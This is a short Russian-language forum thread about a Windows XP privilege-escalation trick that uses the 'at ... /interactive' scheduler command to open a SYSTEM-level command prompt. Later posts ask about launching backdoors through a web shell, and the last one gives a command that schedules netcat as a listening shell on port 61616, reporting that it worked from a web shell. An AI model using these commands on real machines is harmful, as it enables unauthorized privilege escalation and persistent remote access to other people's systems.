Веселая довольно-таки фишка.
http://www.projectstreamer.com/users/r0t0r00t3r/xp_priv_esc-1/xp_priv_esc.html
не знал про это честно..

что делает чел..

заходит под левым акком. дальше cmd.exe
C:/folder/>at 20:22 /interactive "cmd.exe"
т.е. он ставим задачу на открытие цмд через минуту...

проходит минута.. открываается ком. строка... но! уже с системными привилегиями!! =)))
челу ничего не остается как.. убить свой explorer.exe.. и загрузить через ту где привилегии новый.. вот и все.. проще простого..

бред-небред но все же )

PS работает не от геста, а от простого непревилегированного юзера.+ самого админа естесно win xp he sp2 + full patched.. джае если послденее то system вроде как выше чем обычный админ..

Прикольно) тоже не знал...

Не знал... Хмммммм =)

Под ограниченной учетной записью не пашет.

А... я вот пробовал. И не раз. А так вещица, то занимательная...

Если допустим есть веб-шелл, можно ли на удаленной машине так же запускать бакдооры с правами системы?

C:/folder/>at 20:22 /interactive "cmd.exe backdoor.exe"

Если допустим есть веб-шелл, можно ли на удаленной машине так же запускать бакдооры с правами системы?
Если у тебя есть права админа, то да. Если же веб-сервер запушен под ограниченной учетной записью, то скорее всего нет

Если вырубить сервис Task Scheduler - работать не будет.

Если вырубить сервис Task Scheduler - работать не будет.

вырубить этот сервис - чисто параноя ) можно еще все порты закрыть на всякий случай )

C:/folder/>at 20:22 /interactive "cmd.exe c:/system32/nc.exe -L -p 61616 -e cmd.exe"
У меня на 1 тачке прокатило с web шела.